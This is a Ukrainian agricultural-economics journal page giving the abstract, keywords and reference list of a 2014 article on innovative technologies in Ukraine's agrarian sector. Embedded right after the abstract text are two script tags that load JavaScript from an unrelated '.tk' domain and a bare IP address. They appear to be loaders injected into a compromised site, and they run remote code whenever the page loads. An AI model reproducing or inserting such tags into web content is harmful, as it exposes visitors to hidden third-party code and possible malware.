ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.436
Сторінка молодого науковця

Інноваційні технології в аграрній сфері: сутність, класифікація та українські реалії / Савицький Е. Е. // Економіка АПК. - 2014. - № 2 - С. 110

Досліджено сутність, зміст та особливості інноваційних технологій аграрних підприємств, вивчено проблематику їхньої систематизації й класифікації, а також проаналізовано сучасний стан їх впровадження в українському аграрному секторі. За результатами здійсненого дослідження сформовано авторське трактування поняття “інновації в аграрній сфері”, запропоновано визначення інноваційних технологій в АПК і досліджено їхні сучасні системно-структурні особливості в українській аграрній сфері. Показана предметна структура інноваційних технологій в АПК, на основі якої було проаналізовано результати впровадження інноваційних технологій у практичну діяльність аграрних підприємств останніми роками, визначено слабкі сторони їхньої інноваційної діяльності та накреслено перспективні напрями подальшої роботи. Табл.: 2. Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інновація, інноваційна технологія, класифікація інноваційних технологій, аграрні підприємства, впровадження інноваційних технологій, агропромисловий комплекс

Список використаних джерел

 1. Балабанов И.Т. Инновационный менеджмент / И.Т. Балабанов. – СПб. : Питер, 2010. – 208 с.
 2. Бухвостов Ю.В. Детерминирующее воздействие инвестиций на формирование экономики инновационного типа (на примере аграрного сектора): дис. канд. экон. наук / Ю.В. Бухвостов. – М., 2009. – 262 с.
 3. Гончаров В.Н. Теоретические основы формирования и развития инновационно-инвестиционной деятельности предприятий АПК / В.Н. Гончаров, А.К. Каменский // Наук. вісн. Луганського нац. аграр. ун-ту. Серія: економічні науки, 2009. – № 2.
 4. Закон України “Про державне регулювання діяльності у сфері трансферу технологій” // Відом. Верхов. Ради України (ВВР). – 2010. – № 12. – С. 93.
 5. Кот О.В. Теоретичні аспекти інноваційного розвитку аграрного сектору економіки та його організаційно-економічне забезпечення / О.В. Кот // Проблеми науки. – 2008. – № 9. – С. 30-37.
 6. Сіренко Н.М. Управління інноваційною системою аграрного підприємства / Н.М. Сіренко // Економіка АПК. – 2009. – № 9. – С. 43-46.
 7. Степаненко Д.М. Классификация инноваций и ее стандартизация / Д.М. Степаненко // Инновации. – 2004. – № 7. – С. 77-79.
 8. Трубилин А.И. Инновационный путь развития агропромышленного производства / А.И. Трубилин // Власть. – 2009. – № 2. – С. 8-11.
 9. Шайтан Б.И. Инновации в АПК и роль службы сельскохозяйственного консультирования // Матер. междунар. науч.-практ. конф. “Инновационная деятельность в АПК: опыт и проблемы” (13-14 янв. 2005 г.). – М., 2005. – С. 206-213.
 10. Шпикуляк О.Г. Інституції у розвитку та регулюванні аграрного ринку: [моногр.] / О.Г. Шпикуляк. – К.: ННЦ ІАЕ, 2010. – 396 с.
 11. Янковська О.І. Особливості інновацій в сільському господарстві [Електронний ресурс] / О.І. Янковська. – Режим доступу: http://archive.nbuv.gov.ua/e-journals/eui/2010_2/10yaoiicg.pdf.
 12. Carl K. Eicher, John M. Staatz. International Agricultural Development (The Johns Hopkins Studies in Development). – Publisher: The Johns Hopkins University Press; 3rd edition, 1998. – 632 p.
 13. Manfred Zeller. The Triangle of Microfinance: Financial Sustainability, Outreach, and Impact (International Food Policy Research Institute). – Publisher: International Food Policy Research Institute, 2003. – 424 p.
 14. Mensh G. Stalemate in technology: Innovation Overcome the Depression. – Cambridge: Mass, 1979. – 241 p.
 15. World Bank. Agriculture Investment Sourcebook (Trade and Development). – Publisher: World Bank Publications, 2005. – 536 p.
Читати статтю: 14_02_110-115.pdf
Читати переклад статті: 1402savytskyi.pdf